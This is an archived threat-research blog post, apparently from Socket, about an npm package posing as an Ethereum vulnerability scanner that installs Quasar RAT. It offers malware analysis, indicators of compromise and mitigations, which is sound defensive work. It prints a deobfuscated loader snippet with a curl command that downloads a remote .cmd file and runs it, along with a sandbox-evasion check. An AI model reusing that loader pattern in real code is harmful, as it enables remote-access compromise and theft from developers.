{
	"id": "86d86976-c11c-494a-a2e3-2886ccbb196a",
	"created_at": "2026-04-06T00:18:24.82436Z",
	"updated_at": "2026-04-10T03:20:31.40843Z",
	"deleted_at": null,
	"sha1_hash": "805592bb74de10d6e9e42c12eb82b7702f182f28",
	"title": "Quasar RAT Disguised as an npm Package for Detecting Vulnera...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 929869,
	"plain_text": "Quasar RAT Disguised as an npm Package for Detecting Vulnera...\r\nArchived: 2026-04-05 17:05:16 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nSocket’s threat research team has discovered a malicious npm package, ethereumvulncontracthandler , which is\r\nposing as a tool for detecting vulnerabilities in Ethereum smart contracts but instead deploys Quasar RAT, a\r\nversatile remote access trojan, onto developers’ machines.\r\nThe malicious package, published on December 18, 2024, by a threat actor using the npm registry alias “solidit-dev-416”, is heavily obfuscated. Upon installation, it retrieves a malicious script from a remote server, executing it\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 1 of 5\n\nsilently to deploy the RAT on Windows systems. The package is still live on npm at the time of publishing, but we\r\nhave petitioned the registry for its removal.\r\nThreat Analysis#\r\n“There’s a rat in mi kitchen what am I gonna do?”\r\nFrom “Rat in Mi Kitchen” by UB40, a reggae track by the British band often using metaphors for\r\nsocial and personal issues. Here, the “rat” symbolizes a hidden threat within a trusted environment.\r\nQuasar RAT has circulated in cybercrime and APT campaigns for nearly a decade. Beyond providing remote\r\naccess, it offers a robust suite of capabilities, including keystroke logging, screenshot capturing, credential\r\nharvesting, and file exfiltration. For both individual developers and large organizations, the presence of Quasar\r\nRAT in a trusted environment can have catastrophic consequences. Ethereum developers, in particular, face the\r\nrisk of exposing private keys and credentials linked to significant financial assets. On a larger scale, development\r\nsystems compromised with Quasar RAT can pave the way for enterprise-wide breaches.\r\nQuasar RAT remote desktop functionality in action\r\nThreat Actor’s Strategy#\r\n“You practice lies and deceit”\r\nAnother line from UB40’s “Rat in Mi Kitchen”. Here, referring to dishonesty, echoing the threat actor’s\r\ndeceptive practices in disguising malware.\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 2 of 5\n\nThe threat actor used a variety of techniques to ensure their malware remained hidden and resilient. solidit-dev-416 wrapped their code in multiple layers of obfuscation, employing Base64 and XOR encoding, function\r\nwrapping, and minification to complicate analysis and evade detection. Furthermore, the malicious code\r\nconducted system resource checks, such as verifying available memory, to avoid execution in automated analysis\r\nsandboxes. The delivery mechanism was equally disguised: the initial npm package acted as a loader, retrieving\r\nand executing Quasar RAT from a remote server.\r\nThe threat actor’s deceptive description of the malicious package claiming that it helps Ethereum\r\ndevelopers detect vulnerabilities with AI\r\nThe following malicious code snippets, deobfuscated, defanged, and annotated with comments, offer insight into\r\nthe threat actor’s methods.\r\n// The code is heavily obfuscated with base64 and XOR encoding to hinder static analysis:\r\nconst _0x2ea2 = ['W5tdN8k6vCol', 'prototype', 'W7D3g8kgWPq=', ...]; // Large obfuscated array\r\n(function (_0x57fc1d, _0xcf027c) {\r\n \r\n// Nested anonymous functions and complex loops to evade detection\r\n})(_0x2ea2, 0x178);\r\n// Checks system RAM to avoid low-resource sandboxes or VMs\r\n if (checkRAM()) {\r\n await new Promise(_0x244073 =\u003e setTimeout(_0x244073, 0x1d4c0));\r\n // Downloads and executes kk.cmd from a remote server, initiating the Quasar RAT infection\r\n exec(\"curl -k -L -Ss hxxps://jujuju[.]lat/files/kk.cmd -o \\\"%TEMP%\\\\kk.cmd\\\" \u0026\u0026 \\\"%TEMP%\\\\kk.cmd\\\"\");\r\n }\r\nOnce the malicious npm package is installed, it initiates the second stage of the attack by downloading and\r\nexecuting a malicious script from hxxps://jujuju[.]lat/files/kk.cmd . This script, upon execution, runs hidden\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 3 of 5\n\nPowerShell commands and triggers the Quasar RAT infection (SHA256:\r\n9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876 ) on the victim’s system. As a result,\r\nQuasar RAT becomes embedded within the compromised environment. To ensure persistence and continued\r\noperation after system reboots, it modifies the Windows registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run and renames itself to the innocuous-sounding client.exe to avoid attracting attention.\r\nWith the RAT operational, the focus shifts from initial infection to maintaining persistence and exfiltrating data\r\nthrough a C2 server at captchacdn[.]com:7000 (IP address: 154.216.17[.]47 ). The threat actor also uses this\r\nC2 server to catalog infected machines, and manage multiple compromised hosts simultaneously if this campaign\r\nis part of a botnet infection. At this stage, the victim’s machine is fully compromised, and is under complete\r\nsurveillance and control by the threat actor, ready for regular check-ins and to receive updated instructions.\r\nRecommendations and Mitigations#\r\n“I’m gonna fix that rat, that’s what I’m gonna do”\r\nThe final lyric from UB40’s “Rat in Mi Kitchen” that we use as a call for taking decisive action to\r\naddress and remediate this and other supply chain threats.\r\nThe discovery of Quasar RAT masked as a tool for detecting Ethereum smart contract vulnerabilities signals how\r\nthreat actors choose their targets and implement their tactics, techniques, and procedures (TTPs). By embedding\r\nmalicious code into what appears to be a helpful and specialized package, a threat actor can compromise entire\r\nnetworks of developers and enterprises.\r\nAddressing such stealthy threats demands a vigilant and layered approach to security. Development teams should\r\nscrutinize all third-party code they bring into their projects, especially if it claims advanced functionalities or\r\ncomes from relatively unknown authors. Monitoring network traffic for unusual outbound connections and\r\ninvestigating unexpected file modifications can help detect compromised environments early.\r\nEmploying trusted tools to continuously assess dependencies is essential. Integrating Socket’s free GitHub app,\r\nCLI tool, or browser extension can provide real-time insights into the integrity of your supply chain, alerting you\r\nto malicious or suspicious components before they become entrenched. By combining careful vetting, continuous\r\nmonitoring, and the strategic use of dedicated security tools, developers and organizations can stay one step ahead\r\nand ensure that the “rats” stay out of their kitchens.\r\nIndicators of Compromise (IOCs):#\r\nMalicious npm Package: ethereumvulncontracthandler\r\nQuasar RAT SHA256: 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876\r\nMalicious Download URL: hxxps://jujuju[.]lat/files/kk.cmd (defanged)\r\nC2 Server: captchacdn[.]com:7000\r\nC2 IP Address: 154.216.17[.]47\r\nMITRE ATT\u0026CK Techniques:#\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 4 of 5\n\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nT1027 — Obfuscated Files or Information\r\nT1059.001 — Command and Scripting Interpreter: PowerShell\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1105 — Ingress Tool Transfer\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1056.001 — Input Capture: Keylogging\r\nT1113 — Screen Capture\r\nT1005 — Data from Local System\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nT1041 — Exfiltration Over C2 Channel\r\nSource: https://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://socket.dev/blog/quasar-rat-disguised-as-an-npm-package"
	],
	"report_names": [
		"quasar-rat-disguised-as-an-npm-package"
	],
	"threat_actors": [],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.pdf",
		"text": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.txt",
		"img": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.jpg"
	}
}